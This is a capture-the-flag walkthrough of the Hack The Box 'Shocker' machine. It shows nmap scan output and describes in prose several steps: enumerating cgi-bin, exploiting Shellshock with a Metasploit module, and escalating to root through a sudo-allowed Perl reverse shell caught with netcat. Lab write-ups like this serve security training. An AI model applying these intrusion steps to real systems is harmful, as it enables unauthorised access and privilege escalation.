search
Page cover
gitlabEdit

Shocker

Nmap Scan

                                                                               
┌──(abhinav㉿ETHICALHACKX)-[~]
└─$ sudo nmap -p- -Pn shocker.htb -T5
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-22 20:40 IST
Stats: 0:03:01 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 62.92% done; ETC: 20:45 (0:01:47 remaining)
Nmap scan report for shocker.htb (10.10.10.56)
Host is up (0.16s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE
80/tcp   open  http
2222/tcp open  EtherNetIP-1

Nmap done: 1 IP address (1 host up) scanned in 310.35 seconds
                                                                                
┌──(abhinav㉿ETHICALHACKX)-[~]
└─$ sudo nmap -sC -sV -p 80,2222 -A shocker.htb
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-22 20:55 IST
Nmap scan report for shocker.htb (10.10.10.56)
Host is up (0.16s latency).

PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c4f8ade8f80477decf150d630a187e49 (RSA)
|   256 228fb197bf0f1708fc7e2c8fe9773a48 (ECDSA)
|_  256 e6ac27a3b5a9f1123c34a55d5beb3de9 (ED25519)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.13 (95%), Linux 3.2 - 4.9 (95%), Linux 4.8 (95%), Linux 4.9 (95%), Linux 3.16 (95%), Linux 3.12 (95%), Linux 3.18 (95%), Linux 3.8 - 3.11 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 4.4 (95%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   160.27 ms 10.10.14.1
2   160.38 ms shocker.htb (10.10.10.56)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.61 seconds

Checking the website with browser reveals nothing , there is just a picture and nothing in view-source .

Let us check the existing directories ( if any ) on the machine.

gobuster on first scan did not give much apart from directory - /cgi-bin/ cgi-bin directory is normally to handle stuff from WebServer to scripts for certain executions.

Let us further enumerate the directory - /cgi-bin/ , We are changing the below options for results. Since cgi-bin is known to have scripts, we add -x pl,sh Checking cgi-bin in browser gives access denied, so we include 403 in status codes to give back results for.

The machine name, script, directory- cgi-bin, on apache2, point to ShellShock vulnerability. Lets check for shellshock exploitation .

Nmap Shellshock Vulnerability Check.

We have the script from Nmap for explotation but for easy way around I will use metasploit I have selected Shellshock - exploit/multi/http/apache_mod_cgi_bash_env_exec and set a payload.

Now show options, and set RHOST, LHOST, LPORT, TARGETURI , and run or exploit

Now we have a shell, lets switch to pty shell with python and check the user directory or flags. With sudo -l we also see we can run perl with sudo without password.

Lets get the Perl Reverse Shell one-liner from Pentest Monkeyarrow-up-right and execute it with sudo. and listen on the set port with netcat with nc -nlvp port_number_here

Flags

PreviousLameNextTryHackMe

Last updated